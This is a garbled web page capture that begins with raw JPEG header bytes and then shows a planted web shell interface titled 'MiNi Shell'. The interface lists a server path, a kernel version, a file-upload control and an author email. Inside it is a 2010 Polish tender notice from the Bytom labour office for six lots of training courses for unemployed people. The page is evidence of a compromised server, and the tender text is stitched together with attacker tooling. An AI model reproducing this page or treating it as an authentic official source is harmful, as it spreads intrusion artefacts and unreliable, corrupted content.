JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/282660-N-2010.html

<p class="kh_header"><b>Bytom: Szkolenia  osób bezrobotnych, 
w podziale na VI  części.</b><br>
<b>Numer ogłoszenia: 282660 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Łagiewnicka 15, 41-902 Bytom, woj. śląskie, tel. 032 2813307, 2817019, 2818860, faks 032 2818860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupbytom.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostak organizacyjna samorzątu terytorialnego. Powiatowy Urząd Pracy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia  osób bezrobotnych, 
w podziale na VI  części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są szkolenia zawodowe i komputerowe osób bezrobotnych zarejestrowanych  w Powiatowym Urzędzie Pracy w Bytomiu w podziale na  VI  części.
Szkolenia winny odbywać się na terenie Bytomia lub w innej miejscowości, przy czym łączny czas dojazdu z centrum Bytomia do miejsca odbywania szkolenia i z powrotem środkami transportu zbiorowego nie może przekraczać 3 godzin. Zajęcia winny odbywać się codziennie, wyłącznie od poniedziałku do piątku, w godzinach przedpołudniowych lub popołudniowych. (zaczynać się nie wcześniej niż o godz. 8;00 kończyć nie później niż            o godzinie 19;00),    w formie kursu , realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godz. zegarowych w tygodniu (nie dotyczy szkolenia instruktor nauki jazdy kat. B)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.55.00.00-4, 80.41.12.00-0, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać zaktualizowany na 2010 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (jt. Dz. U. z 2008 r. Nr 69, poz. 415).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż w celu realizacji nin. zamówienia dysponuje lokalem obejmującym co najmniej:
a) salę wykładową posiadającą oświetlenie dzienne z możliwością zaciemnienia w postaci
     zasłon, rolet czy żaluzji oraz oświetlenie sztuczne,
      b)   WC,
      
c)   pomieszczenie umożliwiające przygotowanie i spożycie posiłku oraz przygotowanie
            ciepłych i zimnych napojów                                                                                                 oraz wskazać podstawę dysponowania powyższym zasobem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, iż posiada aktualne opłacone ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności szkoleniowej co najmniej na kwotę 20.000,00 zł.
W przypadku rozłożenia składki ubezpieczeniowej na raty, Zamawiający uzna spełnienie warunku w przypadku, gdy na dzień składania ofert opłacona została część wymagalnej składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)strona tytułowa - OFERTA,
2)preliminarz kosztów szkolenia 
3)program szkolenia,
4)pełnomocnictwo do reprezentowania firmy w postępowaniu, jeżeli nie wynika ono z dokumentów przedłożonych w ofercie; w tym wynikające     z art. 23 ustawy Prawo zamówień publicznych,
5)zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert                w przypadku, gdy ofertę składa osoba fizyczna,
6)wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom - dotyczy wyłącznie Wykonawców, którzy zamierzają powierzyć wykonanie części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty , za wyjątkiem możliwości i warunków dokonania takiej zmiany określonych poniżej:
a)	zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
b)	zmiana terminu wykonania zamówienia będąca następstwem okoliczności, których nie można było wcześniej przewidzieć i nie można jej przypisać Wykonawcy, w tym w przypadku przedłużającej się procedury przetargowej, jeżeli do wykonania zamówienia pozostało mniej niż 2 miesiące od dnia zawarcia umowy
c)	zmiany osób odpowiedzialnych za realizację niniejszej umowy,
d)	zmiany ilości uczestników szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupbytom.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41 - 902 BYTOM 
pok. 62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41 - 902 BYTOM 
pok. 24 - Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I  - obejmuje jedno szkolenie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZŁONEK SŁUŻBY INFORMACYJNEJ ORGANIZATORA IMPREZY MASOWEJ.

Liczba godzin na szkoleniu musi wynosić min. 79 godz. i następujące przedmioty nauczania:
-	Blok zawodowy;
-	Samoobrona.
	
Zamówienie obejmuje przeszkolenie od 12 do 15 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.55.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II  - obejmuje jedno szkolenie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> INSTRUKTOR NAUKI JAZDY KAT. B.

Liczba godzin na szkoleniu musi wynosić 213 godz. Szkolenie musi zawierać następujące bloki tematyczne:
-	Psychologia;
-	Metodyka nauczania;
-	Prawo w ruchu drogowym;
-	Technika kierowania i obsługa pojazdu;
-	Bezpieczeństwo ruchu drogowego;
-	Zasady prowadzenia ośrodka szkolenia;
-	Praktyka instruktora;
-	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie od podpisania umowy do 31 stycznia 2011 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III - obejmuje trzy szkolenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  PORTIER.

Liczba godzin na szkoleniu musi wynosić min. 150 godz. i następujące przedmioty nauczania:

-	Elementy elektryki - drobne prace przy instalacji niskiego napięcia;  
-	Elementy hydrauliki; 
-	Konserwacja i utrzymanie dobrego stanu urządzeń technicznych - malowanie, uzupełnianie ubytków w glazurze i powierzchniach płaskich i perforowanych, zbijanie starego tynku, wyrównywanie podłoża, drobne naprawy ślusarskie, szklenie, drobne prace stolarskie; 
-	Utrzymanie porządku we wnętrzu budynku;
-	Prace przy pomocy elektronarzędzi;
-	Uprawnienia palacza CO na paliwa stałe, ciekłe i gazowe.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r.
2. KIEROWCA WÓZKÓW JEZDNIOWYCH Z MODUŁEM WYMIANY BUTLI
    GAZOWYCH.

Liczba godzin na szkoleniu musi wynosić min. 67 i następujące przedmioty nauczania

-	Typy stosowanych wózków widłowych;
-	Budowa wózka;
-	Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami;
-	Czynności kierowcy w czasie pracy;
-	Wiadomości z zakresu ładunkoznawstwa;
-	Wiadomości z zakresu BHP, o dozorze technicznym;
-	Przygotowanie kierowcy do wykonywania czynności wymiany butli;

Zamówienie obejmuje przeszkolenie od 12 do 15 osób i realizowane będzie od podpisania umowy do 31 grudnia 2010 roku.
3. PRACOWNIK MAGAZYNU.

     Liczba godzin na szkoleniu musi wynosić min. 160 i następujące przedmioty nauczania

-	Gospodarka magazynowa w przedsiębiorstwie produkcyjnym  i handlowym;
-	Dokumentacja magazynowa;
-	Inwentaryzacja stanów magazynowych;
-	Gospodarka zapasami;
-	Sprawozdania i analizy;
-	Podstawy obsługi komputera i komputerowych programów handlowych;
-	Obsługa kas fiskalnych;
-	Operator wózka jezdniowego;
-	Wymiana butli gazowej;
-	Szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywnością.

Zamówienie obejmuje przeszkolenie od 12 do 15 osób i realizowane będzie od podpisania umowy do 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV  - obejmuje pięć szkoleń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PODSTAWY KADROWO-PŁACOWE.

Liczba godzin na szkoleniu musi wynosić min. 100 i następujące przedmioty nauczania:

-	Klasyfikacja podstawowych podmiotów gospodarczych i usytuowanie w nich działu kadr i płac;
-	Wybrane zagadnienia z prawa pracy, prawa cywilnego i administracyjnego;
-	Kadry;
-	Ubezpieczenia społeczne;
-	Płace;
-	Obsługa komputera;
-	Program PŁATNIK;
-	Program Symfonia.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie od podpisania umowy do 31 grudnia 2010 r.
2.	FAKTURZYSTA Z OBSŁUGĄ KASY FISKALNEJ I HACCP.

Liczba godzin na szkoleniu musi wynosić min. 150 i następujące przedmioty nauczania:
-	Zakres i obowiązki kasjera;
-	Techniki sprzedaży;
-	Podstawy obsługi klienta;
-	Kasy i drukarki fiskalne - sprzedaż hurtowa i detaliczna z wykorzystaniem kas 
	i drukarek fiskalnych - budowa i obsługa;
-	Podstawy obsługi komputera;
-	Program Subiekt;
-	Wystawianie faktur;
-	Rozliczanie placówki handlowej i kasjerów;
-	HACCP.

Zamówienie obejmować będzie przeszkolenie od 12 do 15 osób i realizowane będzie od podpisania umowy do 31 grudnia 2010 r.
3.  ASYSTENT W DZIALE ADMINISTRACYJNYM.

Liczba godzin na szkoleniu musi wynosić min. 200 godz. i następujące przedmioty nauczania:

-	Organizacja i funkcjonowanie firmy;
-	Zagadnienia prawne;
-	Organizacja pracy asystenta (prowadzenie dokumentacji i kancelarii firmy oraz archiwum, zarządzanie projektami, negocjacje biznesowe);
-	Korespondencja biurowa;
-	Obsługa urządzeń biurowych;
-	Obsługa komputera (MS Office, Internet i poczta elektroniczna);
-	Przygotowywanie spotkań biznesowych.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r.
4. ABC OBSŁUGI KOMPUTERA I INTERNETU.

Liczba godzin na szkoleniu musi wynosić min. 150 godz. i następujące przedmioty nauczania:

-	Podstawy obsługi komputera;
-	System operacyjny Windows;
-	Edytor teksu WORD;
-	Arkusz kalkulacyjny EXCEL;
-	Internet i poczta elektroniczna.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r.
5.  NOWOCZESNY SPRZEDAWCA Z ELEMENTAMI MERCHANDISINGU.

Liczba godzin na szkoleniu musi wynosić min. 200 godz. i następujące przedmioty nauczania:

-	Obsługa kas fiskalnych;
-	Obsługa komputera i komputerowych programów handlowych;
-	Ogólne wiadomości z zakresu towaroznawstwa i technik sprzedaży;
-	Psychologia zachowań klienta;
-	Merchandising - ogólne wiadomości;
-	Zagospodarowanie przestrzeni sklepu;
-	Metody prezentacji produktu;
-	Podstawy marketingu.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V  - obejmuje dwa szkolenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	WIZAŻYSTA - STYLISTA.

Liczba godzin na szkoleniu musi wynosić min. 160 i następujące przedmioty nauczania
-	Analiza kolorystyczna;
-	Przygotowanie skóry do makijażu;
-	Akcesoria i kosmetyki;
-	Makijaż;
-	Stylizacja fryzury;
-	Stylizacja.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie od podpisania umowy do 31 grudnia 2010 roku.
2.	MANICURE-PEDICURE Z ELEMENTAMI KOSMETYKI
      ORAZ PRZEDŁUŻANIEM I ZAGĘSZCZANIEM WŁOSÓW I RZĘS.

Liczba godzin na szkoleniu musi wynosić min. 200 godz. i następujące przedmioty nauczania:

-	Anatoma dłoni i stóp;
-	Schorzenia dermatologiczne dłoni, stóp i paznokci;
-	Manicure kosmetyczny;
-	Pedicure kosmetyczny;
-	Podstawy kosmetologii;
-	Rozpoznawanie rodzaju cery;
-	Wykonywanie klasycznych zabiegów pielęgnacyjnych;
-	Przedłużenia i zagęszczanie włosów;
-	Przedłużanie i zagęszczanie rzęs.

Zamówienie obejmuje przeszkolenie od 12 do 15 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI  - obejmuje jedno szkolenie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KONSULTANT ŚLUBNY.

Liczba godzin na szkoleniu musi wynosić min. 120 godz. i następujące przedmioty nauczania:

-	Zasady obsługi klienta;
-	Tworzenie biznes planu;
-	Planowanie ceremonii ślubnej;
-	Planowanie przyjęcia;
-	Negocjacje;
-	Współpraca z podwykonawcami;
-	Aranżacja ceremonii;
-	Stylizacja pary młodej;
-	Podstawy prowadzenia działalności gospodarczej;
-	Przepisy prawa, w tym prawo autorskie;
-	Ślub i wesele w plenerze.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób i realizowane będzie w terminie od podpisania umowy do 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com